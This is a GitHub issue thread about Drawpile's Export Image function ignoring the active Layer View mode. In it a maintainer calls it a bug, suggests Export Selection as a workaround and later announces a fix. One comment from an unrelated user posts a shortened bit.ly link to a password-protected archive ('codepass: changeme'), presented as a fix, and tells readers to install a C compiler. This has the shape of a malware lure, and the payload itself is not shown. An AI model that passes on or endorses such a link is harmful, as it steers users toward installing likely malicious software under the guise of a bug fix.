### ISSUE TITLE
Export Image according to Layer View Mode

### ISSUE THREAD

**Issue by incoheart** [drawpile/Drawpile#1374]
The Export Image function exports according to the Normal View rather than the activated Layer View of the available Layer View Modes. Maybe this is a feature request on my part, asking that the Export Image be exported according to the current visibility rather than the current canvas state.

 I always export the current sketches with Show Alone Layer when I am using SAI2. I have the habit to use, in this case, **Layer View** for Drawpile as a way to export individual frames of a comic or animation or sketch series. I had just tried and failed to export two of my sketches with the now-working **Layer View** mode. The first sketch that was a multi-layer with each relevant layer visible was the only one exported, whereas the second single layer sketch I quickly tried to export with the Layer View Mode (instead of activating it manually) was still exported as the multi-layer sketch already set to visible. So I exported the same sketch twice without knowing. That's just an example of my workflow.

**Comment by askmeaboutlo0m** [comment]
Also arguably a bug, it's unexpected that the program would export something you're not actually seeing. As a workaround, you can select all and use File → Export Selection instead, that already exports what you see.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by askmeaboutlo0m** [comment]
This is fixed and available in the continuous release now: <https://github.com/drawpile/Drawpile/releases/tag/continuous>

Thanks for reporting it!
